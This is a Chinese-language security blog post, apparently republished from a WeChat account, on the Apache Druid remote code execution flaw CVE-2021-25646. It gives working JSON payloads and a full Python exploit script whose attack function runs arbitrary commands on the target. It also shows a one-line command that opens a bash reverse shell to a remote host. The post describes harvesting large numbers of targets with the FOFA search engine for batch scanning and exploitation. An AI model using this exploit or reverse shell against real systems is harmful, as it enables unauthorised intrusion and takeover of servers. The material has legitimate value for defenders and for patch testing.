```https://druid.apache.org/docs/latest/tutorials/index.htmlwget https://downloads.apache.org/druid/0.19.0/apache-druid-0.19.0-bin.tar.gztar -zxvf apache-druid-0.19.0-bin.tar.gzdd apache-druid-0.19.0-bin./bin/start-micro-quickstart```
对于该漏洞,在目标机器可以出网的情况下,可以反连你自己的http server 然后查看访问日志来检测漏洞是否存在。
payload:```{"type": "index", "spec": {"ioConfig": {"type": "index", "inputSource": {"type": "inline", "data": "{"isRobot":true,"channel":"#x","timestamp":"2021-2-1T14:12:24.050Z","flags":"x","isUnpatrolled":false,"page":"1","diffUrl":"https://www.google.com","added":1,"comment":"Botskapande Indonesien omdirigering","commentLength":35,"isNew":true,"isMinor":false,"delta":31,"isAnonymous":true,"user":"Lsjbot","deltaBucket":0,"deleted":0,"namespace":"Main"}"}, "inputFormat": {"type": "json", "keepNullColumns": true}}, "dataSchema": {"dataSource": "sample", "timestampSpec": {"column": "timestamp", "format": "iso"}, "dimensionsSpec": {}, "transformSpec": {"transforms": [], "filter": {"type": "javascript", "dimension": "added", "function": "function(value) {java.net.URL("http://7.7.7.7:9090")}", "": {"enabled": true}}}}, "type": "index", "tuningConfig": {"type": "index"}}, "samplerConfig": {"numRows": 500, "timeoutMs": 15000}}```
如果目标不能出网可以在web目录写个txt 然后请求访问判读文件是否存在来判读漏洞,由于我对apache-druid研究的不透彻暂时不知道文件该创建在那个目录才能通过web访问到,如果有人知道请告诉我 :)
```function(value) {java.io.PrintWriter("flag.txt")}flystart@flystart-virtual-machine:~/apache-druid/apache-druid-0.19.0$ find ./ -name "flag.txt"|xargs ls -al-rw-r--r-- 1 flystart flystart 0 2月 5 11:11 ./flag.txt```
在web server 未屏蔽错误的情况下可以构造错误的poc 让服务器出错,根据错误信来判读漏洞的存在,这也是下文poc中的检测方法。
有些时候我们需要通过搜索引擎抓取大量的目标进行测试和研究,网上有人对安全研究者常用的搜索引擎做了个排名和对比,我认为不太客观而且缺少了一个很好用并且非常良心的搜索引擎fofa,价格非常便宜,支付一次永久使用,查询不限制次数,普通会员每次可以查询10000条数据,对于安全研究来说完全足够了。我做渗透和漏洞赏金项目的时候经常用它协助寻找目标。
”
我使用C/C++ 写了一款自动抓取网页搜索结果的工具,github上面有很多的python client,大家可以搜一搜。
导出查询结果到文件
获取到大量目标url之后就是编写PoC 和 Exp了,关于漏洞的检测和利用网上有很多开源的框架,我早期一直使用pocsuite和poc-t, 他们都有各自的特色和不足,现在给大家推荐两个漏洞检测和利用框架,一个是我自己开发的非常轻量级的PocStart(https://github.com/ggg4566/PocStart)
另一个是渗透神器goby(https://gobies.org/)
PocStart 是一个轻量级漏洞检测和利用框架,支持python 2 和python3,建议使用python3 ,它的好处是开源轻便,代码只有两百多行,可以根据需求修改,缺点就是PoC不是很多。Goby是一款渗透神器它和fofa都是出自同一家安全公司,这家公司的创始人是大名鼎鼎的黑客zwell,早期开发了很多好用的安全工具,所以这款工具完全按照黑客思维设计,集资产识别和漏洞检测利用为一体,内置两百多个具有实战价值的PoC,是渗透测试的不二神器,目前仍然处于迭代开发中。
接下来我会利用这两个框架实现对apach-druid rce 漏洞的批量检测和利用。
首先说说PocStart ,PoC 编写非常简单,只需要实现
def verify(target_node)def attack(target_node)
这两个函数即可,verify 用来检测漏洞,attack 则利用漏洞。
target_node is dics node = {'target': '', 'port': '', 'param': ''}target 和 port 不用解释大家都很明白,param 在漏洞利用的时候作为exploit的参数传入,比如可以作为文件下载漏洞的文件名称、命令执行的命令等等。
PoC:```python#! /usr/bin/env python# -*- coding:utf-8 -*-# author:flystart# home:www.flystart.org# time:2021/2/4# refer:https://www.tenable.com/cve/CVE-2021-25646# https://mp.weixin.qq.com/s/m7WLwJX-566WQ29Tuv7dtgimport requestsimport json#requests.packages.urllib3.disable_warnings()res = {}def verify(target_node):target = target_node['target']url = target + "/druid/indexer/v1/sampler"res = {}res['Info'] = ""res['Success'] = Falseheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','Content-Type': 'application/json'}try :sess = requests.session()sess.headers = headerspayload = {"type":"index","spec":{"ioConfig":{"type":"index","inputSource":{"type":"inline","data":"{"isRobot":true,"channel":"#x","timestamp":"2021-2-1T14:12:24.050Z","flags":"x","isUnpatrolled":false,"page":"1","diffUrl":"https://xxx.com","added":1,"comment":"Botskapande Indonesien omdirigering","commentLength":35,"isNew":true,"isMinor":false,"delta":31,"isAnonymous":true,"user":"Lsjbot","deltaBucket":0,"deleted":0,"namespace":"Main"}"},"inputFormat":{"type":"json","keepNullColumns":True}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","format":"iso"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type":"javascript","dimension":"added","function":"function(value) {java.io.abc()}","":{"enabled":True}}}},"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}_response= sess.post(url,data=json.dumps(payload),verify=False)res_code = _response.status_coderes_text = _response.text_keyword = "JavaPackage java.io"if 400 == res_code and _keyword in res_text:res['Info'] = 'FOUNDED VULNERABILTY!!!'res['Success'] = Trueexcept Exception as e:res['Info'] = eres['Success'] = Falsereturn resdef attack(target_node):target = target_node['target']param = target_node['param']url = target + "/druid/indexer/v1/sampler"res = {}res['Info'] = ""res['Success'] = Falseheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','Content-Type': 'application/json'}try :sess = requests.session()sess.headers = headerspayload = {"type":"index","spec":{"ioConfig":{"type":"index","inputSource":{"type":"inline","data":"{"isRobot":true,"channel":"#x","timestamp":"2021-2-1T14:12:24.050Z","flags":"x","isUnpatrolled":false,"page":"1","diffUrl":"https://xxx.com","added":1,"comment":"Botskapande Indonesien omdirigering","commentLength":35,"isNew":true,"isMinor":false,"delta":31,"isAnonymous":true,"user":"Lsjbot","deltaBucket":0,"deleted":0,"namespace":"Main"}"},"inputFormat":{"type":"json","keepNullColumns":True}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"timestamp","format":"iso"},"dimensionsSpec":{},"transformSpec":{"transforms":[],"filter":{"type":"javascript","dimension":"added","function":"function(value) {java.lang.Runtime.getRuntime().exec('%s')}"%(param),"":{"enabled":True}}}},"type":"index","tuningConfig":{"type":"index"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}_response= sess.post(url,data=json.dumps(payload),verify=False)res_code = _response.status_codeif 200 == res_code:res['Info'] = 'VULNERABILTY Success Exploit!!!|%s'% paramres['Success'] = Trueexcept Exception as e:res['Info'] = eres['Success'] = Falsereturn res```利用前面抓取的目标进行漏洞检测的结果```python3 PocStart.py -iF urls.txt -s apacheDruid/CVE_2021_25646_RCE.py```exploit vulnerabilty:```python PocStart.py -iS http://192.168.181.172:8081 -s apacheDruid/CVE_2021_25646_RCE.py -m attack -param "/bin/bash - c $@|bash 0 echo bash -i >&/dev/tcp/192.168.181.160/4444 0>&1"```
** 接下来重点介绍一下goby poc的生成 **
PoC 生成有两个选项卡,Exploit 是漏洞描述以及其他一些漏洞信息,Query Rule是需要重点关注的字段,Goby在扫描端口的时候会首先去识别webapp,如果识别到了才会调用PoC去扫描,所以这里一定要填写正确,可以阅读右边的帮助语法来填写。
Test 填写是PoC生成的重点,发送一个请求需要设置RequestMethod/Url Path/Header,如果RequestMethod是POST则还需要设置Post Data,Request的各个字段填写完之后进行结果验证条件的设置,主要是根据响应结果来判断漏洞是否验证成果,比如这里验证响应码是400并且Response.body 包含字符串 JavaPackage java.io的设置如下图
简单吧?填写完之后就可以Submit and Sing Ip Scan 测试了
提交之后PoC保存在golibexploitsuser目录,可以在goby修改也可打开编辑器直接修改。
Exploit 不能直接在goby中编辑,网友是通过修改poc来实现,稍微麻烦一些我按照网上的文章修改之后poc会加载失败,这里就不记录了,给篇参考文章大家自行研究。《参考文章》
在批量检测方面,由于goby设计的时候是按照渗透测试的流程来考虑的,第一步是资产探测收集,所以在不扫描目标端口的情况无法利用内置PoC和用户自己的PoC进行扫描,可以在插件商店安装插件goby_exp创建一个空扫描任务批量导入目标地址利用PoC进行扫描;
扫描任务完成之后就可以看到结果了,goby会自动把结果保存下来,如果你想知道更多的玩法,来这里挖掘更多的play 姿势(https://github.com/gobysec/Goby)
Refer:
https://www.tenable.com/cve/CVE-2021-25646
https://mp.weixin.qq.com/s/ssA27HZrZ7Y-wGqJ2gix1w
https://mp.weixin.qq.com/s/m7WLwJX-566WQ29Tuv7dtg
原文始发于微信公众号(FOFA):技术分享|ApacheDruid 远程代码执行漏洞的自动化检测和利用
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论